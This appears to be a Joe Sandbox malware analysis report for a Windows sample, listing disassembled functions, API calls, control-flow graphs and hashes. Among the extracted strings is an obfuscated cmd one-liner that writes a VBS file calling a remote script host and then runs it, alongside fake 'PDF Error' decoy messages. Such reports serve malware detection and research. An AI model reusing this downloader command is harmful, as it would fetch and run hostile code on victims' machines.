                                                                                                      • Archivo no encontrado Error i86wl58, xrefs: 00FE12DD
                                                                                                      • Edit, xrefs: 00FE11DC
                                                                                                      • PDF Error i86wl58, xrefs: 00FE12D8
                                                                                                      • echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9, xrefs: 00FE1207, 00FE12C9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateMessageObjectProc$BeginCompatibleDestroyImageLoadPaintPostQuitSelect
                                                                                                      • String ID: Archivo no encontrado Error i86wl58$Edit$PDF Error i86wl58$echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9
                                                                                                      • API String ID: 498171892-2016669903
                                                                                                      • Opcode ID: 9c83cd70f31a00a96bad45f92116b4b059b0bc6dc737a8d4f41e990b4afb5058
                                                                                                      • Instruction ID: bd46e04773331da25ba5076e674383b8008df65d1686764cd643b9b84276ea79
                                                                                                      • Opcode Fuzzy Hash: 9c83cd70f31a00a96bad45f92116b4b059b0bc6dc737a8d4f41e990b4afb5058
                                                                                                      • Instruction Fuzzy Hash: FC41D331744208AFD7209B66EC0AF7F7799FF88711F00461AF606E51E2CAB5A810F756
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00FE5D4B: HeapFree.KERNEL32(00000000,00000000,?,00FE8DA3,?,00000000,?,?,00FE8DC8,?,00000007,?,?,00FE9264,?,?), ref: 00FE5D61
                                                                                                        • Part of subcall function 00FE5D4B: GetLastError.KERNEL32(?,?,00FE8DA3,?,00000000,?,?,00FE8DC8,?,00000007,?,?,00FE9264,?,?), ref: 00FE5D6C
                                                                                                      • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FE6297
                                                                                                      • GetExitCodeProcess.KERNELBASE(?,?), ref: 00FE62A4
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FE62B9
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FE62C4
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FE62CF
                                                                                                      • __dosmaperr.LIBCMT ref: 00FE62D6
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FE62E1
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FE62EC
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FE62FE
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FE6309
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FE633A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                                                                                      • String ID:
                                                                                                      • API String ID: 2764183375-0
                                                                                                      • Opcode ID: 88284d95cc08867501db3496e58a0c1c2b0e1444a755ee9910050ce4fd1ac718
                                                                                                      • Instruction ID: 410860846531de93f6de5c5fa08195280194b8b60752a36ef45323b1b95c3bb9
                                                                                                      • Opcode Fuzzy Hash: 88284d95cc08867501db3496e58a0c1c2b0e1444a755ee9910050ce4fd1ac718
                                                                                                      • Instruction Fuzzy Hash: AE517C71D0028CAFDF21AFA6CC89BEE7BB8AF50764F104065F911E6151DB354A40FB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 127 fe5f73-fe5f80 128 fe5f9a-fe5f9d 127->128 129 fe5f82-fe5f95 call fe5d38 call fe5c57 127->129 128->129 131 fe5f9f-fe5fa4 128->131 138 fe6127-fe6129 129->138 131->129 133 fe5fa6-fe5faa 131->133 133->129 135 fe5fac-fe5faf 133->135 135->129 137 fe5fb1-fe5fcc call fef1e0 * 2 135->137 143 fe5fce-fe5fd0 137->143 144 fe603f-fe6041 137->144 147 fe6049-fe605d call fef1e0 143->147 148 fe5fd2-fe5fe0 call fef1e0 143->148 145 fe6047 144->145 146 fe6043-fe6045 144->146 145->147 146->145 146->147 154 fe605f-fe606b call fe6ab3 147->154 155 fe608a-fe608c 147->155 148->147 153 fe5fe2-fe5fe4 148->153 156 fe5fe7-fe5fec 153->156 164 fe611b 154->164 165 fe6071-fe607b call fe6166 154->165 158 fe608f-fe6094 155->158 156->156 159 fe5fee-fe6001 call fe728b 156->159 158->158 161 fe6096-fe60ac call fe728b 158->161 172 fe6009-fe601a call fe5726 159->172 173 fe6003-fe6004 159->173 170 fe60ae-fe60b8 call fe5d4b 161->170 171 fe60bd-fe60cd call fe5726 161->171 168 fe611c-fe6122 call fe5d4b 164->168 175 fe6080-fe6085 165->175 184 fe6125-fe6126 168->184 180 fe614e-fe6157 call fe5d4b 170->180 187 fe6159-fe6165 call fe5c67 171->187 188 fe60d3-fe60e7 call fe5d38 171->188 172->187 189 fe6020-fe602d call fea875 172->189 173->168 175->180 180->184 184->138 196 fe60ea-fe60fa call fe5726 188->196 189->187 197 fe6033-fe603d call fe5d4b 189->197 196->187 202 fe60fc-fe6107 call fe6ab3 196->202 197->147 205 fe612a-fe614b call fe5d38 call fe6166 call fe5d4b 202->205 206 fe6109-fe6112 202->206 205->180 206->196 207 fe6114-fe611a call fe5d4b 206->207 207->164
                                                                                                      APIs
                                                                                                      • _strrchr.LIBCMT ref: 00FE5FB6
                                                                                                      • _strrchr.LIBCMT ref: 00FE5FC0
                                                                                                      • _strrchr.LIBCMT ref: 00FE5FD5
                                                                                                        • Part of subcall function 00FE5D4B: HeapFree.KERNEL32(00000000,00000000,?,00FE8DA3,?,00000000,?,?,00FE8DC8,?,00000007,?,?,00FE9264,?,?), ref: 00FE5D61
                                                                                                        • Part of subcall function 00FE5D4B: GetLastError.KERNEL32(?,?,00FE8DA3,?,00000000,?,?,00FE8DC8,?,00000007,?,?,00FE9264,?,?), ref: 00FE5D6C
                                                                                                        • Part of subcall function 00FE5C67: IsProcessorFeaturePresent.KERNEL32(00000017,00FE5C56,?,00FE9FAF,?,00FE9E42,00000000,?,00000000,?,00FE5BCD,?,00000000,00FE9E42,?,00FE9FAF), ref: 00FE5C69
                                                                                                        • Part of subcall function 00FE5C67: GetCurrentProcess.KERNEL32(C0000417,00FE9FAF,?,00000000,?,00000000,?,?,00FE9FAF,?,00FE9E42,00000000,?,00000000,00FE9E42,?), ref: 00FE5C8C
                                                                                                        • Part of subcall function 00FE5C67: TerminateProcess.KERNEL32(00000000,?,?,00FE9FAF,?,00FE9E42,00000000,?,00000000,00FE9E42,?,?,?,00FF5B00,0000002C,00FE9EB3), ref: 00FE5C93
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
                                                                                                      • String ID: .com
                                                                                                      • API String ID: 3694955208-4200470757
                                                                                                      • Opcode ID: a8e1c772054e51887a4ef7a626e64fc3c01c30265612cdc580b8d4935e323927
                                                                                                      • Instruction ID: 76c11f0df51ef88f5491accc7a56ba5bc927c15b4be8b9c004baefd22c3993ba
                                                                                                      • Opcode Fuzzy Hash: a8e1c772054e51887a4ef7a626e64fc3c01c30265612cdc580b8d4935e323927
                                                                                                      • Instruction Fuzzy Hash: C15128729047C97AEB356A778C46B7B3758DFA1BF8F14042DF900DB183EA298D01B261
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00FE502A,?,00FE4F1A,00000000,?,?,00FE502A,8C3A99CC,?,00FE502A), ref: 00FE4F31
                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00FE4F1A,00000000,?,?,00FE502A,8C3A99CC,?,00FE502A), ref: 00FE4F38
                                                                                                      • ExitProcess.KERNEL32 ref: 00FE4F4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 5fe6fb1ba6e1f2aa6fe980263f281284e736d1630a2f8141c7dec2bff680b511
                                                                                                      • Instruction ID: ce5efd6a02f81e72ebd9d02a44daeeb634387ced3937180f7347e14d50d8d217
                                                                                                      • Opcode Fuzzy Hash: 5fe6fb1ba6e1f2aa6fe980263f281284e736d1630a2f8141c7dec2bff680b511
                                                                                                      • Instruction Fuzzy Hash: E1D06731404188BBCB012FA1DD09A693F2AAE50B55B044054B9194A162CF39A951EA80
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,00FE4910), ref: 00FE82CB
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00FE4910), ref: 00FE830A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentStrings$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3328510275-0
                                                                                                      • Opcode ID: 6c8a0eb652b3b6828e6c6dc021d1c597dcf02dc4b2d8dda67f1086bf3e14d1b8
                                                                                                      • Instruction ID: 08533cbd502bf79c34be56174a27f95f587ea0c381e5be8104125e42042e8241
                                                                                                      • Opcode Fuzzy Hash: 6c8a0eb652b3b6828e6c6dc021d1c597dcf02dc4b2d8dda67f1086bf3e14d1b8
                                                                                                      • Instruction Fuzzy Hash: CAE09B77609AA52A9622323A7C4A99F2A4ECFC2BB57150125F51545182EE584C0360F1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 284 feacfd-fead58 call fe69fc call fe695d 289 feadba-feadbe 284->289 290 fead5a-fead71 call fe69fc call fe695d 284->290 291 feadc7-feadcb 289->291 292 feadc0-feadc6 call fe5d4b 289->292 290->289 306 fead73-fead76 290->306 295 feadcd-feadd5 call fe5d4b 291->295 296 feadd6-feadda 291->296 292->291 295->296 301 feaddc-feade4 call fe5d4b 296->301 302 feade5-feadea 296->302 301->302 308 fead78-fead92 call fe69fc call fe695d 306->308 309 fead96-feadb8 CreateProcessW 306->309 308->289 314 fead94 308->314 309->289 314->309
                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNELBASE(?,00000001,?,?,?,00000000,?,00000000,00000001,00000000,?,?,?,?,00000000,?), ref: 00FEADB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 8587101e08f3064a4d39045db3a9a161d31bdad3ec5534075b91b0a2617b15cd
                                                                                                      • Instruction ID: b02dba0d430ef03269c9c775bd3642f04b7c3e3ff555ad7d6d35fee9a9f5e1cc
                                                                                                      • Opcode Fuzzy Hash: 8587101e08f3064a4d39045db3a9a161d31bdad3ec5534075b91b0a2617b15cd
                                                                                                      • Instruction Fuzzy Hash: 5C316AB2C0028DAFCF119F9ACC819EEBFB9BF18314F44416AF804B2222D7358951EB51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 315 fe728b-fe7296 316 fe7298-fe72a2 315->316 317 fe72a4-fe72aa 315->317 316->317 318 fe72d8-fe72e3 call fe5d38 316->318 319 fe72ac-fe72ad 317->319 320 fe72c3-fe72d4 RtlAllocateHeap 317->320 324 fe72e5-fe72e7 318->324 319->320 321 fe72af-fe72b6 call fe51aa 320->321 322 fe72d6 320->322 321->318 328 fe72b8-fe72c1 call fe99b0 321->328 322->324 328->318 328->320
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00FE7001,00000001,00000364,00000000,00000005,000000FF,?,00FE9F4A,?,?,00000000), ref: 00FE72CC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: e1cbf84cbdebbf60d0c1450a6e6729ade531c19d1a4466586664f092bfd5b7ab
                                                                                                      • Instruction ID: f2dc4ee926e951950dc53dc79b3300844992c2f0afd3c2063a612cb70e7300d6
                                                                                                      • Opcode Fuzzy Hash: e1cbf84cbdebbf60d0c1450a6e6729ade531c19d1a4466586664f092bfd5b7ab
                                                                                                      • Instruction Fuzzy Hash: BCF0E232A0C7A86AEB317A239C05B6E374C9F91B70B148116FF04A6191CE34DC01BFB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 331 fe8e93-fe8e9f 332 fe8ed1-fe8edc call fe5d38 331->332 333 fe8ea1-fe8ea3 331->333 341 fe8ede-fe8ee0 332->341 335 fe8ebc-fe8ecd RtlAllocateHeap 333->335 336 fe8ea5-fe8ea6 333->336 337 fe8ecf 335->337 338 fe8ea8-fe8eaf call fe51aa 335->338 336->335 337->341 338->332 343 fe8eb1-fe8eba call fe99b0 338->343 343->332 343->335
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00FE7B98,00FE9E42,?,00FE7B98,00000220,?,?,00FE9E42), ref: 00FE8EC5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 7a6a153f5ada94bc45125d71e0979f87565d9ca1763132d5c75b959bae381e55
                                                                                                      • Instruction ID: 07f978fbdb382bf90ce58aa118275d1a4c50f367cc8e7756f772744f55ae7324
                                                                                                      • Opcode Fuzzy Hash: 7a6a153f5ada94bc45125d71e0979f87565d9ca1763132d5c75b959bae381e55
                                                                                                      • Instruction Fuzzy Hash: 93E06D22A056A966EB313AF79C05B6FB64C9F41BF0F150125EC0EA71D2DF64CC02F2A5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00FE7607
                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00FE7682
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FE76A4
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FE76C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFile$FirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 1164774033-0
                                                                                                      • Opcode ID: d6b0f0041e7bcc884e1dd147e1241e6e59e4fd92c5ea813639f1c15ae5ef9b12
                                                                                                      • Instruction ID: 8d95c367a55341808b87d947860f44d094450516079f3c8fc514960c4694fe28
                                                                                                      • Opcode Fuzzy Hash: d6b0f0041e7bcc884e1dd147e1241e6e59e4fd92c5ea813639f1c15ae5ef9b12
                                                                                                      • Instruction Fuzzy Hash: 7641B171D08759AEDB20FF6ACC88ABAB779EB84318F144195E40596184EB309E84EB64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FE1A9A
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00FE1B66
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FE1B86
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00FE1B90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 254469556-0
                                                                                                      • Opcode ID: 9b666ccd8cb21cbf413a3489e7213f01f72a0a3391cdb8983ad13331488f7878
                                                                                                      • Instruction ID: f93ab82f8f72f4e2b33b395e0b531c8aee0c6dc725368d489cdd9297345ec7cb
                                                                                                      • Opcode Fuzzy Hash: 9b666ccd8cb21cbf413a3489e7213f01f72a0a3391cdb8983ad13331488f7878
                                                                                                      • Instruction Fuzzy Hash: 06312775D0121C9BDB20DFA5D989BCCBBB8BF08300F1041AAE40CAB250EB749B85DF44
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00FE5B53
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00FE5B5D
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00FE5B6A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                      • String ID:
                                                                                                      • API String ID: 3906539128-0
                                                                                                      • Opcode ID: 66644a9a856ed3b769fafa5fba15399bed50aa207b627a0f242d08a03b295c1c
                                                                                                      • Instruction ID: 9f7ccffbcc32d058586e98e274042f742f61f39a30180c34c3826deb77e9f2e0
                                                                                                      • Opcode Fuzzy Hash: 66644a9a856ed3b769fafa5fba15399bed50aa207b627a0f242d08a03b295c1c
                                                                                                      • Instruction Fuzzy Hash: 8A31D47490121C9BCB21DF29DC89BDCBBB8BF08710F5042EAE41CA6251EB749F859F44
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FEE99C,?,?,00000008,?,?,00FEE59F,00000000), ref: 00FEEBCE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise
                                                                                                      • String ID:
                                                                                                      • API String ID: 3997070919-0
                                                                                                      • Opcode ID: 4f89dd75e7ac15fb05ca4c63c5ee3ae3ed3ee96d566a41533f5108adce2a747e
                                                                                                      • Instruction ID: 10310f2c8e8f83b13a68783c3c34cbbd7481e01efae064a0e8059384b12478e1
                                                                                                      • Opcode Fuzzy Hash: 4f89dd75e7ac15fb05ca4c63c5ee3ae3ed3ee96d566a41533f5108adce2a747e
                                                                                                      • Instruction Fuzzy Hash: 5BB17C32610648CFD719CF29D48AB657BE0FF44364F29865CE89ACF2A1C335E982DB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FE1D4B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 2325560087-0
                                                                                                      • Opcode ID: cc590421fc78157cff5c137e639093d4f8e78c1342f888daa37d84409f4d1e4e
